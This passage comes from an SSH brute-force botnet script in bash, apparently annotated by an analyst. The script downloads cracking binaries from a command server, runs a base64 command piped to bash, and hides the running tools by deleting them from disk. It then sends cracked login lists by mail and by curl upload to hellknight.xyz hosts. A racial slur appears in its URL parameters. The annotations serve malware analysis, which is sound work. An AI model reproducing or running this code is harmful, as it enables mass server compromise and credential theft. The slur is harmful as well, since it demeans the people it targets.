rm -rf ssh.log scan.log ssh_vuln.log input.txt banners.log banner.log 2>/dev/null
sleep $sleep_time
total_pass=$(cat pass_files/$pass_file | wc -l)
echo -e "   ${YELLOW}-------------------------Total Passwords [ $total_pass ]------------------------${RESET}"
sleep $sleep_time
echo -e "   ${YELLOW}-------------Bruter Started [ $total_ips:$pass_file {$port} $total_ips:$total_pass]-------------${RESET}"
# --- brute_type "prg": binary fetched from $host/prg, saved as ./-bash.prg,
# made executable with the setuid/setgid bits set (chmod +sx), run, removed.
if [ "$brute_type" == "prg" ];	then
download "$host/prg" ./-bash.prg
chmod +sx ./-bash.prg
mv i ips.lst
mv pass_files/pass.lst ./pass.lst
./-bash.prg  250 $port normal PRG-oldTeam
rm -Rf ./$brute_type/ i pass_files/$pass_file ips.lst pass.lst ./-bash.prg 2>/dev/null
fi
# --- brute_type "spirit1": uses ./spirit/-bash from the tgz archive, with
# the same self-update checks as at the top of the outer loop.
if [ "$brute_type" == "spirit1" ];	then
binary="./spirit/-bash"
count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade)
if [ ! -x "./spirit/-bash" ]; then
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
sleep 2
count=1
else
count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade)
if [ "$count" -eq 1 ]; then
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
fi
./spirit/-bash 2>tmp1
x=$(tail -n2 tmp1 | tr -d '\n' | sed 's/[[:space:]]*$//' | sed 's/\x1b\[[0-9;]*m//g')
rm -Rf tmp1
if [[ "$x" == *"Spirit Pro"* ]]; then
echo ""
else
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
fi
fi
# Credential list is rewritten from "user pass" to "user:pass" (first space
# on each line only).
sed -i 's/ /:/' pass_files/pass.lst
rm -rf filtered.txt
# Banner pass over the target list; b.lst is then reduced to its first two
# colon-separated fields and becomes the new target list.
./spirit/-bash banner -H ./i --threads 256 1>/dev/null 2>/dev/null
cat b.lst |cut -d':' -f1,2 > ./i
rm -Rf b.lst
# Login attempts; $brute_cmd is passed with -c. Job count is 250 on x86_64
# and 100 on other architectures.
if [ "$arch" == "x86_64" ];	then
./spirit/-bash -l pass_files/pass.lst -H ./i -c "$brute_cmd" brute -j 250 --block=true
else
./spirit/-bash -l pass_files/pass.lst -H ./i -c "$brute_cmd" brute -j 100 --block=true
fi
rm -Rf ips.txt i  pass_files/$pass_file ips.lst pass.lst b.lst 2>/dev/null
fi
# --- brute_type "prg75": binary fetched from $host/prg75, saved as ./-bash
# with setuid/setgid+exec bits, configured through config.ini.
if [ "$brute_type" == "prg75" ];	then
download "$host/prg75" ./-bash
chmod +sx ./-bash
mv pass_files/pass.lst ./pass.txt
rm -Rf pass_files
echo "num_threads=500" > config.ini
echo "command=1" >> config.ini
# custom_command pipes a base64 string through `base64 -d | bash`.
# NOTE(review): the blob appears to decode to the same PROC/UNAME echo as
# $brute_cmd - confirm by decoding offline.
echo "custom_command=\"echo ZWNobyAiUFJPQzokKG5wcm9jIDI+IC9kZXYvbnVsbCkgVU5BTUU6JCh1bmFtZSAtYSAyPiAvZGV2L251bGwpIgo= |base64 -d |bash\"" >> config.ini
echo "verbose=0" >> config.ini
# The tool runs in the background while its binary, inputs and config are
# deleted from disk and the script's /proc entry is re-masked several times;
# a running process whose executable is deleted is a useful triage signal.
./-bash &
sleep 30s
hideshit
rm -Rf ./-bash i pass_files/$pass_file ips.lst pass.lst ips.txt pass.txt config.ini 2>/dev/null
sleep 45s
hideshit
sleep 20s
rm -Rf ./-bash i pass_files/$pass_file ips.lst pass.lst ips.txt pass.txt ./-bash config.ini 2>/dev/null
hideshit
wait
fi
# --- brute_type "haiduc": binary fetched from $host/haiduc into
# ./haiduc/-bash, started in the background, and its directory and inputs
# deleted 30 s later while it is still running.
if [ "$brute_type" == "haiduc" ];	then
mkdir ./$brute_type/ 2>/dev/null
download "$host/haiduc" ./$brute_type/-bash
chmod +sx ./$brute_type/-bash
./$brute_type/-bash $brute_threads -f i pass_files/$pass_file $port "$brute_cmd" &
sleep 30s
rm -Rf ./$brute_type/ i pass_files/$pass_file 2>/dev/null
wait
fi
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Killing Bruter Pids-------------------------${RESET}"
killall -9 pass_files 2>/dev/null
pkill -f pass_files 2>/dev/null
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Clearing Vuln List---------------------------${RESET}"
# Each tool writes its hits to a different file (sparte.txt, ssh_vuln,
# vuln.txt, found.lst). The branches below normalise them into filtered.txt
# and delete the originals.
if [ "$brute_type" == "haiduc" ];	then
if [ -f "sparte.txt" ];	then
cat sparte.txt |sort |uniq | tr ':' ' '  | awk '{print $1":"$2":"$3":"$5" PROC:"$7" TYPE:"$9 }' > filtered.txt
rm -rf sparte.txt
fi
fi
if [ "$brute_type" == "prg" ];	then
if [ -f "ssh_vuln" ];	then
cat ssh_vuln | grep -v -e 'i-i57hue27' | grep -e "GNU/Linux" -e FreeBSD -e ppc -e "This account is currently not available" | awk '{ip=$2; port=$4; $2=""; print ip ":" port ":" $0}' | sort | uniq >> filtered.txt
rm -rf ssh_vuln
fi
fi
if [ "$brute_type" == "prg75" ];	then
if [ -f "vuln.txt" ];	then
cat vuln.txt |sort |uniq | tr ':' ' '  | awk '{print $2":"$3":"$4":"$5" PROC:"$7" TYPE:"$9" HOSTNAME:"$10" KERNEL:"$11" ARCH:"$23}' > filtered.txt
rm -rf vuln.txt
fi
fi
if [ "$brute_type" == "spirit1" ];	then
if [ -f "found.lst" ];	then
cat found.lst | grep -e "GNU/Linux" |grep -v "This account is currently not available" | awk '{ split($1, a, /:/); $1 = a[3]":"a[4]":"a[1]":"a[2]; print}' | sort | uniq >> filtered.txt
rm -rf found.*
fi
fi
# Exfiltration, only when filtered.txt exists and is non-empty.
if [[ -f "filtered.txt" && -s "filtered.txt" ]];	then
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Generating POST-ID---------------------------${RESET}"
if [ -z "$MYIP" ];	then
postid=$(whoami)@$IP
else
postid=$(whoami)@$MYIP
fi
sleep $sleep_time
echo -e "   ${YELLOW}--------------------------Uploading Vulns List--------------------------${RESET}"
# Channel 1: local MTA. A "Subject: Server Results" header is prepended to
# the file and it is sent with both sendmail and mail to a fixed recipient.
# Outbound mail to that address in MTA logs is an indicator.
if [ -s "filtered.txt" ]; then
sed -i '1s/^/Subject: Server Results\n/' filtered.txt
sendmail "scan@hellknight.xyz" < filtered.txt 2>/dev/null
mail -s "Server Results" "scan@hellknight.xyz" < filtered.txt 2>/dev/null
fi
# Channel 2: HTTP multipart upload over plain http to a hard-coded C2 URL
# (not $host). The upload file is a copy of filtered.txt named after this
# machine's /etc/machine-id.
cp filtered.txt $(cat /etc/machine-id)
upload=$(./curl -A 'curl/7.85.0' -s -m200   -F f=@./$(cat /etc/machine-id) "http://api.hellknight.xyz:8880/api2.php?endpoint=upload&dirty=fucking.sand.niggers&host=$(uname -n)" )
# Notification: node name and result line count are sent to the API's
# `sendmessage` endpoint.
ircmsg="$(uname -n)_$(wc -l ./$(cat /etc/machine-id) |cut -d' ' -f1)"
./curl -s "$host/$api?endpoint=sendmessage&dirty=fucking.sand.niggers&message=$ircmsg" -A 'curl/7.85.0'
if [ "$upload" == "success" ];	then
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Removing Vuln List---------------------------${RESET}"
rm -rf filtered.txt
rm -Rf ./$(cat /etc/machine-id)
else
# Upload did not return "success": mail the results again under a different
# subject, then delete the local copies.
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Mailing Vuln List----------------------------${RESET}"
sed -i '1s/^/Subject: Server Information\n/' filtered.txt
sendmail "scan@hellknight.xyz" < filtered.txt 2>/dev/null
sed -i '1d' filtered.txt 2> /dev/null
mail -s "Server Information" "scan@hellknight.xyz" < filtered.txt 2>/dev/null
rm -Rf filtered.txt ./$(cat /etc/machine-id)
fi
fi
# End-of-cycle cleanup, then a new value for $port is requested from the C2.
rm -rf pass_files/$pass_file pass_files/user pass_files/pass filtered.txt ./$(cat /etc/machine-id)
get_random_port
echo -e "   ${YELLOW}-------------------------Thankyou For Scanning-------------------------${RESET}"
done
done
